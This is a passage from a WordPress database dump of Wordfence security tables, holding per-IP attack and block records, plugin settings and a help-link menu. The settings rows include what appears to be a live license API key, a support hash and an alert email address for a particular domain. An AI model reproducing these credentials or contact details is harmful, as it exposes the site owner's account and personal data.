('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 'BG', 59, 19817, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 'BG', 8, 19815, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 'BG', 2, 19815, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ1Íˆ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿu÷`I', 'IN', 2, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿHÿ\Z±', 'PK', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿj3—ñ', 'IN', 1, 19818, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 'BG', 10, 19816, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 'BG', 1, 19816, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 'BG', 3, 19823, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿMÝ›í', 'RU', 1, 19823, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹¢‚', 'NL', 1, 19823, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 'BG', 28, 19823, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÆ]¹', 'SG', 1, 19823, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹Ç¯–', 'RO', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿhƒ*§', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ôú', 'BG', 1, 19799, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 2, 19799, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ^.©à', 'PT', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ/ó0|', 'HK', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¨wi', 'DE', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿRîŠ', 'US', 3, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ˜Yê7', 'SI', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÎí ', 'US', 3, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-O*S', 'US', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿg-Bä', 'HK', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿe!-=', 'SG', 1, 19807, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 'NL', 1, 19806, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 'BG', 12, 19806, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 'SG', 1, 19806, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ²Ÿ%&', 'UA', 2, 19806, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹œ¬¦', 'NL', 1, 19808, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 'DE', 2, 19808, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿMÝ˜', 'RU', 1, 19808, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÕÊé"', 'DE', 2, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 'UA', 1, 19812, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿˆ', 'GB', 1, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹kpÅ', 'DK', 1, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹ G', 'DE', 2, 19799, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹Ç¯–', 'RO', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ[', 'IR', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 'NL', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ-·÷ ', 'CO', 1, 19798, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿNŸcÍ', 'DE', 1, 19804, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 'DE', 4, 19804, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹ñÐv', 'PL', 1, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿRîŠ', 'US', 1, 19797, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿª¦º', 'US', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ‹c3Í', 'SG', 10, 19795, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿS‡É', 'US', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿÃÉÉ', 'DE', 2, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿk®ºJ', 'US', 2, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 'DE', 5, 19797, 'waf'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¹ G', 'DE', 1, 19795, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ3S¹£', 'FR', 1, 19800, 'brute'),
('\0\0\0\0\0\0\0\0\0\0ÿÿ¤DÄ', 'DE', 1, 19800, 'brute');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfblocks7`
--

CREATE TABLE `wpou_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfblocks7`
--

INSERT INTO `wpou_wfblocks7` VALUES
(5960, 2, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝ›í', 1712749633, 'Blocked by Wordfence Security Network', 1712749633, 1, 1712750233, NULL),
(5961, 2, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ]¹', 1712770133, 'Blocked by Wordfence Security Network', 1712770133, 1, 1712770733, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfconfig`
--

CREATE TABLE `wpou_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfconfig`
--

INSERT INTO `wpou_wfconfig` VALUES
('alertOn_update', '0', 'yes'),
('alertOn_scanIssues', '1', 'yes'),
('alertOn_throttle', '0', 'yes'),
('alertOn_block', '1', 'yes'),
('alertOn_loginLockout', '1', 'yes'),
('alertOn_breachLogin', '1', 'yes'),
('alertOn_lostPasswdForm', '1', 'yes'),
('alertOn_adminLogin', '1', 'yes'),
('alertOn_firstAdminLoginOnly', '0', 'yes'),
('alertOn_nonAdminLogin', '0', 'yes'),
('alertOn_firstNonAdminLoginOnly', '0', 'yes'),
('alertOn_wordfenceDeactivated', '1', 'yes'),
('alertOn_wafDeactivated', '1', 'yes'),
('liveTrafficEnabled', '0', 'yes'),
('advancedCommentScanning', '1', 'yes'),
('checkSpamIP', '1', 'yes'),
('spamvertizeCheck', '1', 'yes'),
('liveTraf_ignorePublishers', '1', 'yes'),
('liveTraf_displayExpandedRecords', '0', 'no'),
('scheduledScansEnabled', '1', 'yes'),
('lowResourceScansEnabled', '0', 'yes'),
('scansEnabled_checkGSB', '1', 'yes'),
('scansEnabled_checkHowGetIPs', '1', 'yes'),
('scansEnabled_core', '1', 'yes'),
('scansEnabled_themes', '0', 'yes'),
('scansEnabled_plugins', '0', 'yes'),
('scansEnabled_coreUnknown', '1', 'yes'),
('scansEnabled_malware', '1', 'yes'),
('scansEnabled_fileContents', '1', 'yes'),
('scansEnabled_fileContentsGSB', '1', 'yes'),
('scansEnabled_checkReadableConfig', '1', 'yes'),
('scansEnabled_suspectedFiles', '1', 'yes'),
('scansEnabled_posts', '1', 'yes'),
('scansEnabled_comments', '1', 'yes'),
('scansEnabled_suspiciousOptions', '1', 'yes'),
('scansEnabled_passwds', '1', 'yes'),
('scansEnabled_diskSpace', '1', 'yes'),
('scansEnabled_wafStatus', '1', 'yes'),
('scansEnabled_options', '1', 'yes'),
('scansEnabled_wpscan_fullPathDisclosure', '1', 'yes'),
('scansEnabled_wpscan_directoryListingEnabled', '1', 'yes'),
('scansEnabled_scanImages', '0', 'yes'),
('scansEnabled_highSense', '0', 'yes'),
('scansEnabled_oldVersions', '1', 'yes'),
('scansEnabled_suspiciousAdminUsers', '1', 'yes'),
('scan_force_ipv4_start', '0', 'yes'),
('liveActivityPauseEnabled', '1', 'yes'),
('firewallEnabled', '1', 'yes'),
('autoBlockScanners', '1', 'yes'),
('loginSecurityEnabled', '1', 'yes'),
('loginSec_strongPasswds_enabled', '1', 'yes'),
('loginSec_breachPasswds_enabled', '1', 'yes'),
('loginSec_lockInvalidUsers', '0', 'yes'),
('loginSec_maskLoginErrors', '1', 'yes'),
('loginSec_blockAdminReg', '1', 'yes'),
('loginSec_disableAuthorScan', '1', 'yes'),
('loginSec_disableApplicationPasswords', '1', 'yes'),
('loginSec_disableOEmbedAuthor', '0', 'yes'),
('loginSec_requireAdminTwoFactor', '0', 'yes'),
('notification_updatesNeeded', '1', 'yes'),
('notification_securityAlerts', '1', 'yes'),
('notification_promotions', '1', 'yes'),
('notification_blogHighlights', '1', 'yes'),
('notification_productUpdates', '1', 'yes'),
('notification_scanStatus', '1', 'yes'),
('enableRemoteIpLookup', '1', 'yes'),
('other_hideWPVersion', '0', 'yes'),
('other_blockBadPOST', '0', 'yes'),
('other_scanComments', '1', 'yes'),
('other_pwStrengthOnUpdate', '1', 'yes'),
('other_WFNet', '1', 'yes'),
('other_scanOutside', '0', 'yes'),
('other_bypassLitespeedNoabort', '0', 'yes'),
('deleteTablesOnDeact', '0', 'yes'),
('autoUpdate', '1', 'yes'),
('startScansRemotely', '0', 'yes'),
('disableConfigCaching', '0', 'yes'),
('addCacheComment', '0', 'yes'),
('disableCodeExecutionUploads', '0', 'yes'),
('allowHTTPSCaching', '0', 'yes'),
('debugOn', '0', 'yes'),
('email_summary_enabled', '1', 'yes'),
('email_summary_dashboard_widget_enabled', '1', 'yes'),
('ssl_verify', '1', 'yes'),
('ajaxWatcherDisabled_front', '0', 'yes'),
('ajaxWatcherDisabled_admin', '0', 'yes'),
('wafAlertOnAttacks', '1', 'yes'),
('disableWAFIPBlocking', '0', 'yes'),
('showAdminBarMenu', '1', 'yes'),
('displayTopLevelOptions', '1', 'yes'),
('displayTopLevelBlocking', '0', 'yes'),
('displayTopLevelLiveTraffic', '0', 'yes'),
('displayAutomaticBlocks', '1', 'yes'),
('allowLegacy2FA', '0', 'yes'),
('wordfenceI18n', '1', 'yes'),
('scan_include_extra', '', 'yes'),
('alertEmails', 'web21@freshgasflow.com', 'yes'),
('liveTraf_ignoreUsers', '', 'yes'),
('liveTraf_ignoreIPs', '', 'yes'),
('liveTraf_ignoreUA', '', 'yes'),
('maxMem', '256', 'yes'),
('scan_exclude', '', 'yes'),
('scan_maxIssues', '1000', 'yes'),
('scan_maxDuration', '', 'yes'),
('scan_max_resume_attempts', '2', 'yes'),
('whitelisted', '', 'yes'),
('whitelistedServices', '{}', 'yes'),
('bannedURLs', '', 'yes'),
('maxExecutionTime', '0', 'yes'),
('howGetIPs', '', 'yes'),
('actUpdateInterval', '2', 'yes'),
('alert_maxHourly', '0', 'yes'),
('loginSec_userBlacklist', '', 'yes'),
('liveTraf_maxRows', '2000', 'yes'),
('liveTraf_maxAge', '30', 'yes'),
('neverBlockBG', 'neverBlockVerified', 'yes'),
('loginSec_countFailMins', '240', 'yes'),
('loginSec_lockoutMins', '240', 'yes'),
('loginSec_strongPasswds', 'pubs', 'yes'),
('loginSec_breachPasswds', 'admins', 'yes'),
('loginSec_maxFailures', '20', 'yes'),
('loginSec_maxForgotPasswd', '20', 'yes'),
('maxGlobalRequests', 'DISABLED', 'yes'),
('maxGlobalRequests_action', 'throttle', 'yes'),
('maxRequestsCrawlers', 'DISABLED', 'yes'),
('maxRequestsCrawlers_action', 'throttle', 'yes'),
('maxRequestsHumans', 'DISABLED', 'yes'),
('maxRequestsHumans_action', 'throttle', 'yes'),
('max404Crawlers', 'DISABLED', 'yes'),
('max404Crawlers_action', 'throttle', 'yes'),
('max404Humans', 'DISABLED', 'yes'),
('max404Humans_action', 'throttle', 'yes'),
('blockedTime', '300', 'yes'),
('email_summary_interval', 'weekly', 'yes'),
('email_summary_excluded_directories', 'wp-content/cache,wp-content/wflogs', 'yes'),
('allowed404s', '/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml', 'yes'),
('wafAlertWhitelist', '', 'yes'),
('wafAlertInterval', '600', 'yes'),
('wafAlertThreshold', '100', 'yes'),
('howGetIPs_trusted_proxies', '', 'yes'),
('scanType', 'standard', 'yes'),
('manualScanType', 'onceDaily', 'yes'),
('schedStartHour', '19', 'yes'),
('schedMode', 'auto', 'yes'),
('cbl_loggedInBlocked', '', 'yes'),
('cbl_action', 'block', 'yes'),
('cbl_redirURL', '', 'yes'),
('cbl_bypassRedirURL', '', 'yes'),
('cbl_bypassRedirDest', '', 'yes'),
('cbl_bypassViewURL', '', 'yes'),
('loginSec_enableSeparateTwoFactor', '', 'yes'),
('blockCustomText', '', 'yes'),
('alertOn_severityLevel', '25', 'yes'),
('apiKey', 'eb21b7807b82cbe30725d53b5200266e9a19fd6268f2c0c14ccb6edcaf185e6b8a52342c6b793b60cb358db43f2d6f9caa0026a30369e55a59d000a337637e58', 'yes'),
('keyType', 'free', 'yes'),
('isPaid', '', 'yes'),
('hasKeyConflict', '0', 'yes'),
('timeoffset_wf_updated', '1712728668', 'yes'),
('cacheType', 'disabled', 'yes'),
('detectProxyRecommendation', 'REMOTE_ADDR', 'no'),
('dismissAutoPrependNotice', '1', 'yes'),
('onboardingAttempt1', 'skipped', 'yes'),
('onboardingAttempt2', 'skipped', 'yes'),
('onboardingAttempt3', '', 'no'),
('onboardingAttempt3Initial', '1', 'yes'),
('onboardingDelayedAt', '1685470091', 'yes'),
('needsNewTour_dashboard', '0', 'yes'),
('needsNewTour_firewall', '1', 'yes'),
('needsNewTour_scan', '1', 'yes'),
('needsNewTour_blocking', '1', 'yes'),
('needsNewTour_livetraffic', '1', 'yes'),
('needsNewTour_loginsecurity', '1', 'yes'),
('needsUpgradeTour_dashboard', '0', 'yes'),
('needsUpgradeTour_firewall', '0', 'yes'),
('needsUpgradeTour_scan', '0', 'yes'),
('needsUpgradeTour_blocking', '0', 'yes'),
('needsUpgradeTour_livetraffic', '0', 'yes'),
('needsUpgradeTour_loginsecurity', '0', 'yes'),
('supportContent', '{"top":[{"title":"Blocking Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/","order":0},{"title":"Optimizing The Firewall","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/","order":1},{"title":"Wordfence Web Application Firewall (WAF)","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/","order":2},{"title":"Scan Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/","order":3},{"title":"Wordfence and LiteSpeed","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/","order":4},{"title":"Two-Factor Authentication","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/","order":5},{"title":"Firewall Learning Mode","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/","order":6},{"title":"Scan Results","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/","order":7},{"title":"I am locked out of my site","permalink":"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site","order":8},{"title":"PHP Fatal error: Failed opening required wordfence-waf.php","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php","order":9}],"all":[{"title":"Wordfence Free","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-free\\/","excerpt":"Wordfence Free is an all-in-one security solution for WordPress websites that includes an endpoint firewall, security scanner, login security, alerts, centralized management, and more.","order":0},{"title":"Wordfence Premium","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-premium\\/","excerpt":"Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.","order":1},{"title":"Wordfence Care","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-care\\/","excerpt":"Wordfence Care is for business owners who place a premium on their time. Our team installs, configures, optimizes, and maintains your WordPress site security.","order":2},{"title":"Wordfence Response","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-response\\/","excerpt":"Wordfence Response is for mission-critical WordPress websites that require 24\\/7\\/365 security monitoring with a 1-hour response time and 24-hour remediation.","order":3},{"title":"Incident Response Services","permalink":"https:\\/\\/www.wordfence.com\\/help\\/incident-response-services\\/","excerpt":"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.","order":4},{"title":"License Key","permalink":"https:\\/\\/www.wordfence.com\\/help\\/api-key\\/","excerpt":"All Wordfence installations need a license key, also known as an API-key. The key can be a free key or a Premium key. ","order":5},{"title":"Account and Billing History","permalink":"https:\\/\\/www.wordfence.com\\/help\\/account\\/","excerpt":"How to navigate and use your Wordfence account.","order":6},{"title":"Wordfence Central","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/","excerpt":"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.","children":[{"title":"Connecting your sites to Wordfence Central","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/","order":0},{"title":"Setting up two-factor authentication","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/","order":1},{"title":"Using the Dashboard page","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/","order":2},{"title":"Using the Configuration page","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/","order":3},{"title":"Using Wordfence plugin options Templates","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/","order":4},{"title":"Viewing scan Findings","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/","order":5},{"title":"Using the Settings page","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/","order":6},{"title":"Using Wordfence Central Teams","permalink":"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/","order":7}],"order":7},{"title":"Dashboard","permalink":"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/","excerpt":"The Wordfence Dashboard provides insight into the current state of your siteâ€™s security.","children":[{"title":"Options","permalink":"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/","order":0},{"title":"Alerts","permalink":"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/","order":1}],"order":8},{"title":"Firewall","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/","excerpt":"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. ","children":[{"title":"Optimizing","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/","order":0},{"title":"Statistics","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/","order":1},{"title":"Learning Mode","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/","order":2},{"title":"Options","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/","order":3},{"title":"MySQLi storage engine","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/","order":4},{"title":"Brute Force Protection","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/","order":5},{"title":"Rate Limiting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/","order":6},{"title":"Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/","order":7}],"order":9},{"title":"Blocking","permalink":"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/","excerpt":"Aside from the firewall rules that protect against various attacks, Wordfence also has custom features for additional blocking. ","children":[{"title":"Country Blocking","permalink":"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/","order":0},{"title":"Blocking Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/","order":1}],"order":10},{"title":"Scan","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/","excerpt":"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, and shells that hackers have installed. It also scans for known malicious URLs and known patterns of infections.","children":[{"title":"Options","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/","order":0},{"title":"Results","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/","order":1},{"title":"Scheduling","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/","order":2},{"title":"Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/","order":3}],"order":11},{"title":"Tools","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/","excerpt":"Wordfence Tools include Live Traffic analysis, WHOIS Lookup, Import\\/Export Options, and Diagnostics.","children":[{"title":"Live Traffic","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/","order":0},{"title":"WHOIS Lookup","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/","order":1},{"title":"Import\\/Export","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/","order":2},{"title":"Diagnostics","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/","order":3},{"title":"Legacy Two-Factor Authentication","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/","order":4},{"title":"Two-Factor Authentication","permalink":"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/","order":5}],"order":12},{"title":"Login Security","permalink":"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/","excerpt":"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.","order":13},{"title":"Advanced","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/","excerpt":"If you want to know more about the technical details of Wordfence, you will find the answers in this section.","children":[{"title":"Changelog","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/","order":0},{"title":"Technical Details","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/","order":1},{"title":"Constants","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/","order":2},{"title":"Remove or Reset","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/","order":3},{"title":"System requirements","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/","order":4},{"title":"Compatibility","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/compatibility\\/","order":5},{"title":"Wordfence API","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/","order":6},{"title":"Troubleshooting","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/","order":7},{"title":"Plugin \\/ Theme Conflicts","permalink":"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/","order":8}],"order":14},{"title":"Wordfence and GDPR - General Data Protection Regulation","permalink":"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/","excerpt":"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available standard contractual clauses to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services.","children":[{"title":"Sub-Processors List","permalink":"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/","order":0}],"order":15},{"title":"Login Security Plugin","permalink":"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/","excerpt":"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either canâ€™t or donâ€™t want to run the full Wordfence plugin.","order":16},{"title":"Wordfence Intelligence","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/","excerpt":"Wordfence Intelligence is an industry-leading WordPress vulnerability database and evolving Threat Intelligence platform that contains over 12,000 records for vulnerabilities in WordPress plugins, themes, and core.","children":[{"title":"V2: Accessing and Consuming the Vulnerability Data Feed","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/v2-accessing-and-consuming-the-vulnerability-data-feed\\/","order":0},{"title":"V1: Accessing and Consuming the Vulnerability Data Feed","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/accessing-and-consuming-the-vulnerability-data-feed\\/","order":1},{"title":"Wordfence Intelligence Webhook Notifications","permalink":"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/wordfence-intelligence-webhook-notifications\\/","order":2}],"order":17}]}', 'yes'),
('supportHash', 'b08dc0902cf6fee340fe72de085ba1e37233c761a0f6c4b950152647b3a5abb8', 'yes'),
('whitelistPresets', '{"wordfence":{"n":"Wordfence","h":true,"d":true,"f":true,"r":["54.68.32.247","69.46.36.0\\/27","2605:2400:0104:0100::\\/56"]},"sucuri":{"n":"Sucuri","d":true,"r":["97.74.127.171","69.164.203.172","173.230.128.135","66.228.34.49","66.228.40.185","50.116.36.92","50.116.36.93","50.116.3.171","198.58.96.212","50.116.63.221","192.155.92.112","192.81.128.31","198.58.106.244","192.155.95.139","23.239.9.227","198.58.112.103","192.155.94.43","162.216.16.33","173.255.233.124","173.255.233.124","192.155.90.179","50.116.41.217","192.81.129.227","198.58.111.80","162.216.19.183"]},"facebook":{"n":"Facebook","d":true,"r":["69.63.176.0\\/20","66.220.144.0\\/20","66.220.144.0\\/21","69.63.184.0\\/21","69.63.176.0\\/21","74.119.76.0\\/22","69.171.255.0\\/24","173.252.64.0\\/18","69.171.224.0\\/19","69.171.224.0\\/20","103.4.96.0\\/22","69.63.176.0\\/24","173.252.64.0\\/19","173.252.70.0\\/24","31.13.64.0\\/18","31.13.24.0\\/21","66.220.152.0\\/21","66.220.159.0\\/24","69.171.239.0\\/24","69.171.240.0\\/20","31.13.64.0\\/19","31.13.64.0\\/24","31.13.65.0\\/24","31.13.67.0\\/24","31.13.68.0\\/24","31.13.69.0\\/24","31.13.70.0\\/24","31.13.71.0\\/24","31.13.72.0\\/24","31.13.73.0\\/24","31.13.74.0\\/24","31.13.75.0\\/24","31.13.76.0\\/24","31.13.77.0\\/24","31.13.96.0\\/19","31.13.66.0\\/24","173.252.96.0\\/19","69.63.178.0\\/24","31.13.78.0\\/24","31.13.79.0\\/24","31.13.80.0\\/24","31.13.82.0\\/24","31.13.83.0\\/24","31.13.84.0\\/24","31.13.85.0\\/24","31.13.86.0\\/24","31.13.87.0\\/24","31.13.88.0\\/24","31.13.89.0\\/24","31.13.90.0\\/24","31.13.91.0\\/24","31.13.92.0\\/24","31.13.93.0\\/24","31.13.94.0\\/24","31.13.95.0\\/24","69.171.253.0\\/24","69.63.186.0\\/24","31.13.81.0\\/24","179.60.192.0\\/22","179.60.192.0\\/24","179.60.193.0\\/24","179.60.194.0\\/24","179.60.195.0\\/24","185.60.216.0\\/22","45.64.40.0\\/22","185.60.216.0\\/24","185.60.217.0\\/24","185.60.218.0\\/24","185.60.219.0\\/24","129.134.0.0\\/16","157.240.0.0\\/16","157.240.8.0\\/24","157.240.0.0\\/24","157.240.1.0\\/24","157.240.2.0\\/24","157.240.3.0\\/24","157.240.4.0\\/24","157.240.5.0\\/24","157.240.6.0\\/24","157.240.7.0\\/24","157.240.9.0\\/24","157.240.10.0\\/24","157.240.16.0\\/24","157.240.19.0\\/24","157.240.11.0\\/24","157.240.12.0\\/24","157.240.13.0\\/24","157.240.14.0\\/24","157.240.15.0\\/24","157.240.17.0\\/24","157.240.18.0\\/24","157.240.20.0\\/24","157.240.21.0\\/24","157.240.22.0\\/24","157.240.23.0\\/24","157.240.0.0\\/17","69.171.250.0\\/24","157.240.24.0\\/24","157.240.25.0\\/24","199.201.64.0\\/24","199.201.65.0\\/24","199.201.64.0\\/22","204.15.20.0\\/22","15